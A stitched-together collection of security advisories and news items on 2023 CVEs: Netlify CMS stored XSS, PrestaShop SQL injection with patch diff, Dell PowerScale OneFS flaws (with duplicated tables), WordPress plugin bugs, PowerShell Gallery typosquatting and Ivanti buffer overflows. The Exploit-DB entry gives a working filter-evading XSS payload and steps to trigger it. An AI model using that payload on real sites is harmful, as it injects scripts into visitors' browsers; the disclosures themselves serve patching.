A Cross Site Scripting (XSS) vulnerability in Netlify CMS v.2.10.192 allows a remote attacker to execute arbitrary code via a crafted payload to the body parameter of the new post function.

    # Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
    # Exploit Author: tmrswrr
    # Vendor Homepage: https://decapcms.org/docs/intro/
    # Software Link: https://github.com/decaporg/decap-cms
    # Version: 2.10.192
    # Tested on: https://cms-demo.netlify.com
    
    
    Description:
    
    1. Go to new post and write body field your payload:
    
    https://cms-demo.netlify.com/#/collections/posts
    
    Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
    
    2. After save it XSS payload will executed and see alert box

CVE-2023-38904: OffSec’s Exploit Database Archive

In the module “Customization fields fee for your store” (aicustomfee) from ai-dev module for PrestaShop, an attacker can perform SQL injection up to 0.2.0. Release 0.2.1 fixed this security issue.

In the module “Customization fields fee for your store” (aicustomfee) for PrestaShop, an attacker can perform SQL injection up to 0.2.0. Release 0.2.1 fixed this security issue.

**Summary**

*   **CVE ID**: CVE-2023-33663
*   **Published at**: 2023-08-16
*   **Advisory source**: Friends-Of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: aicustomfee
*   **Impacted release**: < 0.2.1 (0.2.1 fixed issue)
*   **Product author**: ai-dev / @ide-info
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Before 0.2.1, sensitives SQL calls in file includes/ajax.php can be executed with a trivial http call and exploited to forge a blind SQL injection throught the POST or GET submitted data and product variables.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Technical and personal data leaks
*   Obtain admin access
*   Remove all data of the linked PrestaShop
*   Display sensitives tables to front-office to unlock potential admin’s ajax scripts of modules protected by token on the ecosystem

**Patch**

    --- a/modules/aicustomfee/includes/ajax.php
    +++ b/modules/aicustomfee/includes/ajax.php
    switch (Tools::getValue('action')) {
        case 'cloneCombination':
            if (!($data = Tools::getValue('data')) || !($combination = Tools::getValue('combination')) || !($product = Tools::getValue('product'))) {
                die();
            }
                
            $data = explode('|', $data);
    +       $data = array_map('intval', $data);
            $result = Db::getInstance()->getRow(
                'SELECT COUNT(id_product_attribute) AS number, id_product_attribute FROM '._DB_PREFIX_.'product_attribute_combination WHERE id_attribute IN ('.implode(',', $data).') GROUP BY id_product_attribute HAVING number = '.count($data)
            );
            
    --- a/modules/aicustomfee/includes/functions.php
    +++ b/modules/aicustomfee/includes/functions.php
        public function createCombination($product, $old_combination, $data) 
        {
            //    Add for Prestashop 1.5 version and above
            if ((float)Tools::substr(_PS_VERSION_, 0, 3) >= 1.5) {
                $shop_id = (int)Shop::getContextShopGroupID();
            }
    +       $product = (int) $product;
    +       $old_combination = (int) $old_combination;
    +       $data = array_map('intval', $data);
            //    Get the product data
            $product_data = Db::getInstance()->getRow('SELECT * FROM '._DB_PREFIX_.'product WHERE id_product = '.$product);
    

**Other recommandations**

*   Upgrade PrestaShop to the latest version to disable multiquery execution (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2023-05-08

Vunlnerability found during a audit by 202 ecommerce

2023-05-10

Contact the author

2023-05-12

The author confirm the issue and supply a fixed release

2023-05-12

Request a CVE ID

2023-08-16

Publication of this advisory

**Links**

*   Author product page
*   National Vulnerability Database

CVE-2023-33663: [CVE-2023-33663] Improper neutralization of a SQL parameter in aicustomfee from ai-dev module for PrestaShop


Dell PowerScale OneFS, 8.0.x-9.5.x, contains an improper handling of insufficient privileges vulnerability. A local  privileged attacker could potentially exploit this vulnerability, leading to elevation of privilege and affect in compliance mode also.



**Vaikutus**

High

**Tiedot**

Third-Party Component

CVEs

CVSS Vector String

Apache HTTP Server

CVE-2022-37436, CVE-2006-20001

See NVD link below for CVSS score for CVE.   
http://nvd.nist.gov/

Python py-certifi  module

CVE-2022-23491

https://nvd.nist.gov/vuln/detail/CVE-2022-23491

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-32495

Dell PowerScale OneFS, 8.2.x-9.5.x, contains a exposure of sensitive information to an unauthorized Actor vulnerability. An authorized local attacker could potentially exploit this vulnerability, leading to escalation of privileges.

7.8 

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2023-32487

Dell PowerScale OneFS, 8.2.x - 9.5.0.x, contains an elevation of privilege vulnerability. A low privileged local attacker could potentially exploit this vulnerability, leading to denial of service, code execution and information disclosure. 

7.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2023-32493

Dell PowerScale OneFS, 9.5.0.x, contains a protection mechanism bypass vulnerability. An unprivileged, remote attacker could potentially exploit this vulnerability, leading to denial of service, information disclosure and remote execution.

7.3

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2023-32494

Dell PowerScale OneFS, 8.0.x-9.5.x, contains an improper handling of insufficient privileges vulnerability. A local  privileged attacker could potentially exploit this vulnerability, leading to elevation of privilege and affect in compliance mode also.

6.7

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2023-32486

Dell PowerScale OneFS 9.5.x version contain a privilege escalation vulnerability. A low privilege local attacker could potentially exploit this vulnerability, leading to escalation of privileges.

6.7

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVE-2023-32489

Dell PowerScale OneFS 8.2x -9.5x contains a privilege escalation vulnerability. A local attacker with high privileges could potentially exploit this vulnerability, to bypass mode protections and gain elevated privileges.  

6.7

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2023-32490

Dell PowerScale OneFS 8.2x -9.5x contains an improper privilege management vulnerability. A high privilege local attacker could potentially exploit this vulnerability, leading to system takeover. 

6.7

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2023-32491

Dell PowerScale OneFS 9.5.0.x, contains an insertion of sensitive information into log file vulnerability in SNMPv3. A low privileges user could potentially exploit this vulnerability, leading to information disclosure.

6.3

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2023-32488

Dell PowerScale OneFS, 8.2.x-9.5.0.x, contains an information disclosure vulnerability in NFS. A low privileged attacker could potentially exploit this vulnerability, leading to information disclosure.

5.3

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE-2023-32492

Dell PowerScale OneFS 9.5.0.x contains an incorrect default permissions vulnerability. A low-privileged local attacker could potentially exploit this vulnerability, leading to information disclosure or allowing to modify files.

5.3

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-32495

Dell PowerScale OneFS, 8.2.x-9.5.x, contains a exposure of sensitive information to an unauthorized Actor vulnerability. An authorized local attacker could potentially exploit this vulnerability, leading to escalation of privileges.

7.8 

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2023-32487

Dell PowerScale OneFS, 8.2.x - 9.5.0.x, contains an elevation of privilege vulnerability. A low privileged local attacker could potentially exploit this vulnerability, leading to denial of service, code execution and information disclosure. 

7.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2023-32493

Dell PowerScale OneFS, 9.5.0.x, contains a protection mechanism bypass vulnerability. An unprivileged, remote attacker could potentially exploit this vulnerability, leading to denial of service, information disclosure and remote execution.

7.3

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2023-32494

Dell PowerScale OneFS, 8.0.x-9.5.x, contains an improper handling of insufficient privileges vulnerability. A local  privileged attacker could potentially exploit this vulnerability, leading to elevation of privilege and affect in compliance mode also.

6.7

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2023-32486

Dell PowerScale OneFS 9.5.x version contain a privilege escalation vulnerability. A low privilege local attacker could potentially exploit this vulnerability, leading to escalation of privileges.

6.7

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVE-2023-32489

Dell PowerScale OneFS 8.2x -9.5x contains a privilege escalation vulnerability. A local attacker with high privileges could potentially exploit this vulnerability, to bypass mode protections and gain elevated privileges.  

6.7

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2023-32490

Dell PowerScale OneFS 8.2x -9.5x contains an improper privilege management vulnerability. A high privilege local attacker could potentially exploit this vulnerability, leading to system takeover. 

6.7

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2023-32491

Dell PowerScale OneFS 9.5.0.x, contains an insertion of sensitive information into log file vulnerability in SNMPv3. A low privileges user could potentially exploit this vulnerability, leading to information disclosure.

6.3

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2023-32488

Dell PowerScale OneFS, 8.2.x-9.5.0.x, contains an information disclosure vulnerability in NFS. A low privileged attacker could potentially exploit this vulnerability, leading to information disclosure.

5.3

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE-2023-32492

Dell PowerScale OneFS 9.5.0.x contains an incorrect default permissions vulnerability. A low-privileged local attacker could potentially exploit this vulnerability, leading to information disclosure or allowing to modify files.

5.3

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

CVEs Addressed

Product

Affected Versions

Updated Versions

Link to Update

CVE-2023-32494, CVE-2023-32495, CVE-2023-32487, CVE-2023-32488, CVE-2023-32489, CVE-2023-32490

PowerScale OneFS

Version 9.2.1.0 through 9.2.1.22

Version 9.2.1.23 or later, Version 9.4.0.14 or later, Version 9.5.0.5 or later

PowerScale OneFS Downloads Area

CVE-2023-32494, CVE-2023-32495, CVE-2023-32487, CVE-2023-32488, CVE-2023-32489, CVE-2023-32490

PowerScale OneFS

Version 9.4.0.0 through 9.4.0.13

Version 9.4.0.14 or later, Version 9.5.0.5 or later

PowerScale OneFS Downloads Area

CVE-2023-32494, CVE-2023-32495, CVE-2023-32487, CVE-2023-32488, CVE-2023-32489, CVE-2023-32490, CVE-2023-32486, CVE-2023-32491, CVE-2023-32492, CVE-2023-32493, CVE-2022-23491, CVE-2022-37436, CVE-2006-20001

PowerScale OneFS

Version 9.5.0.0 through 9.5.0.3

Version 9.5.0.5 or later

PowerScale OneFS Downloads Area

CVEs Addressed

Product

Affected Versions

Updated Versions

Link to Update

CVE-2023-32494, CVE-2023-32495, CVE-2023-32487, CVE-2023-32488, CVE-2023-32489, CVE-2023-32490

PowerScale OneFS

Version 9.2.1.0 through 9.2.1.22

Version 9.2.1.23 or later, Version 9.4.0.14 or later, Version 9.5.0.5 or later

PowerScale OneFS Downloads Area

CVE-2023-32494, CVE-2023-32495, CVE-2023-32487, CVE-2023-32488, CVE-2023-32489, CVE-2023-32490

PowerScale OneFS

Version 9.4.0.0 through 9.4.0.13

Version 9.4.0.14 or later, Version 9.5.0.5 or later

PowerScale OneFS Downloads Area

CVE-2023-32494, CVE-2023-32495, CVE-2023-32487, CVE-2023-32488, CVE-2023-32489, CVE-2023-32490, CVE-2023-32486, CVE-2023-32491, CVE-2023-32492, CVE-2023-32493, CVE-2022-23491, CVE-2022-37436, CVE-2006-20001

PowerScale OneFS

Version 9.5.0.0 through 9.5.0.3

Version 9.5.0.5 or later

PowerScale OneFS Downloads Area

**Keinoja ongelman kiertämiseen tai lieventämiseen**

CVEs

Workarounds

CVE-2023-32486

This vulnerability only applies when customers are given ISI\_PRIV\_LOGIN\_SSH or ISI\_PRIV\_LOGIN\_CONSOLE to users.

This vulnerability can be mitigated on new version of PowerScale OneFS i.e. 9.5 or later by enabling the restricted shell for users.

Please enable the restricted shell on cluster using following command to mitigate the issue:  
isi security settings modify  --restricted-shell-enabled=true

CVE-2023-32488

Please reload the export using following command:  
isi nfs exports reload

CVE-2023-32490

This vulnerability only applies when customers are given ISI\_PRIV\_LOGIN\_SSH or ISI\_PRIV\_LOGIN\_CONSOLE to users..

This vulnerability can be mitigated on new version of PowerScale OneFS i.e. 9.5 or later by enabling the restricted shell for users.

Please enable the restricted shell on cluster using following command to mitigate the issue:  
isi security settings modify  --restricted-shell-enabled=true

CVE-2023-32492

This workaround is only applicable to a non-compliance mode cluster.

Please manually change the ownership and permissions of /ifs/netlog directory to more secure values as follows:  
chmod -R 750 /ifs/netlog  
chmod 770 /ifs/netlog/bundled  
chmod 440 /ifs/netlog/bundled/\*.bz2  
chown -R root:wheel /ifs/netlog

In addition to upgrading your version of OneFS or downloading and installing the latest RUP, please manually change the permission of files using following command:  
chmod 440 /ifs/netlog/bundled/\*.bz2

CVE-2023-32494

This vulnerability only applies when customers are given ISI\_PRIV\_LOGIN\_SSH or ISI\_PRIV\_LOGIN\_CONSOLE to users.

This vulnerability can be mitigated on new version of PowerScale OneFS i.e. 9.5 or later by enabling the restricted shell for users.

Please enable the restricted shell on cluster using following command to mitigate the issue:  
isi security settings modify  --restricted-shell-enabled=true

Additionally the severity of this CVE is lowered if customer changes the password hash from the default of NTHASH to a more secure salted SHA256 or SHA512 hash.

**Versiohistoria**

Revision

Date

Description

1.0

2023-08-14

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Lisätietoja**

CVE-2023-32487, CVE-2023-32489, CVE-2023-32490 and CVE-2023-32494 breaks the compliance mode guaranty in compliance mode cluster so it is marked as business critical.

Any version not listed in the Affected Products and Remediation section should upgrade PowerScale OneFS to a version 9.5.0.5 or later.

We encourage all customers to adopt the LTS 2023 version which is 9.5.x code line, with the latest maintenance RUP 9.5.0.5. For more information on LTS (Long Term Support) code lines, see Dell Infrastructure Solutions Group (ISG) LTS Release Support Customer Summary (https://www.dell.com/support/kbdoc/en-us/000206599)

16 elok. 2023

CVE-2023-32494: DSA-2023-269: Security Update for Dell PowerScale OneFS for Multiple Security Vulnerabilities

The REST API TO MiniProgram WordPress plugin through 4.6.1 does not have authorisation and CSRF checks in an AJAX action, allowing ay authenticated users, such as subscriber to call and delete arbitrary attachments

CVE-2023-0551

The YARPP WordPress plugin before 5.30.3 does not validate and escape some of its shortcode attributes before using them in SQL statement/s, which could allow any authenticated users, such as subscribers to perform SQL Injection attacks.

CVE-2023-0579

Active flaws in the PowerShell Gallery could be weaponized by threat actors to pull off supply chain attacks against the registry's users.
"These flaws make typosquatting attacks inevitable in this registry, while also making it extremely difficult for users to identify the true owner of a package," Aqua security researchers Mor Weinberger, Yakir Kadkoda, and Ilay Goldman said in a report shared

Windows Security / Supply Chain

Active flaws in the PowerShell Gallery could be weaponized by threat actors to pull off supply chain attacks against the registry's users.

"These flaws make typosquatting attacks inevitable in this registry, while also making it extremely difficult for users to identify the true owner of a package," Aqua security researchers Mor Weinberger, Yakir Kadkoda, and Ilay Goldman said in a report shared with The Hacker News.

Maintained by Microsoft, PowerShell Gallery is a central repository for sharing and acquiring PowerShell code, including PowerShell modules, scripts, and Desired State Configuration (DSC) resources. The registry boasts 11,829 unique packages and 244,615 packages in total.

The issues identified by the cloud security firm have to do with the service's lax policy surrounding package names, lacking protections against typosquatting attacks, as a result enabling attackers to upload malicious PowerShell modules that appear genuine to unsuspecting users.

A second flaw pertains to the ability of a bad actor to spoof the metadata of a module -- including Author(s), Copyright, and Description fields -- to make it appear more legitimate, thereby deceiving unwitting users into installing them.

"The only way for users to determine the real author/owner is to open the 'Package Details' tab," the researchers said.

"However, this will only lead them to the profile of the fake author, as the attacker can freely choose any name when creating a user in the PowerShell Gallery. Therefore, determining the actual author of a PowerShell module in the PowerShell Gallery poses a challenging task."

Also discovered is a third flaw that could be abused by attackers to enumerate all package names and versions, including those that are unlisted and meant to be hidden from public view.

This can be accomplished by utilizing the PowerShell API "https://www.powershellgallery.com/api/v2/Packages?$skip=number," enabling an attacker to gain unrestricted access to the complete PowerShell package database, including associated versions.

"This uncontrolled access provides malicious actors with the ability to search for potential sensitive information within unlisted packages. Consequently, any unlisted package that contains confidential data, becomes highly susceptible to compromise," the researchers explained.

Aqua said it reported the shortcomings to Microsoft in September 2022, following which the Windows maker is said to have put in place reactive fixes as of March 7, 2023. The problems, however, remain reproducible.

"As we increasingly depend on open-source projects and registries, the security risks associated with them become more prominent," the researchers concluded.

"The responsibility for securing users primarily lies with the platform. It's essential that PowerShell Gallery, and similar platforms, take necessary steps to enhance their security measures."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Experts Uncover Weaknesses in PowerShell Gallery Enabling Supply Chain Attacks

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in PT Woo Plugins (by Webdados) Stock Exporter for WooCommerce plugin <= 1.1.0 versions.

**Solution**

 Fixed

Update the WordPress Stock Exporter for WooCommerce plugin to the latest available version (at least 1.2.0).

LEE SE HYOUNG (hackintoanetwork) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Stock Exporter for WooCommerce Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.2.0.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-30871: WordPress Stock Exporter for WooCommerce plugin <= 1.1.0 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Jonathan Daggerhart Query Wrangler plugin <= 1.5.51 versions.

**Solution**

 Fixed

Update the WordPress Query Wrangler plugin to the latest available version (at least 1.5.52).

LEE SE HYOUNG (hackintoanetwork) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Query Wrangler Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.5.52.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-30779: WordPress Query Wrangler plugin <= 1.5.51 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Multiple critical security flaws have been reported in Ivanti Avalanche, an enterprise mobile device management solution that’s used by 30,000 organizations.
The vulnerabilities, collectively tracked as CVE-2023-32560 (CVSS score: 9.8), are stack-based buffer overflows in Ivanti Avalanche WLAvanacheServer.exe v6.4.0.0.
Cybersecurity company Tenable said the shortcomings are the result of buffer

Software Security / Cyber Threat

Multiple critical security flaws have been reported in Ivanti Avalanche, an enterprise mobile device management solution that's used by 30,000 organizations.

The vulnerabilities, collectively tracked as CVE-2023-32560 (CVSS score: 9.8), are stack-based buffer overflows in Ivanti Avalanche WLAvanacheServer.exe v6.4.0.0.

Cybersecurity company Tenable said the shortcomings are the result of buffer overflows arising as a consequence of processing specific data types.

An unauthenticated remote attacker can specify a long hex string or long type 9 item to overflow the buffer, it noted.

Successful exploitation of both issues could be exploited by a remote adversary to achieve code execution or a system crash.

Stack-based buffer overflow vulnerabilities occur when the buffer being overwritten is in the stack, leading to a scenario where program execution can be altered to run arbitrary code with elevated privileges.

Ivanti has released Avalanche version 6.4.1 to remediate the problem after it was disclosed in April 2023.

The update also addresses six other flaws (from CVE-2023-32561 through CVE-2023-32566) that could pave the way for authentication bypass and remote code execution.

With security flaws in Ivanti software coming under active exploration in recent weeks, it's imperative that users move quickly to apply the fixes to mitigate potential threats.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Security Flaws Affect Ivanti Avalanche, Threatening 30,000 Organizations

Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Kaya Studio Kaya QR Code Generator plugin <= 1.5.2 versions.

**Solution**

 Fixed

Update the WordPress Kaya QR Code Generator plugin to the latest available version (at least 1.5.3).

Found this useful? Thank Mika for reporting this vulnerability. Buy a coffee ☕

Mika discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Kaya QR Code Generator Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.5.3.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

Tag

#auth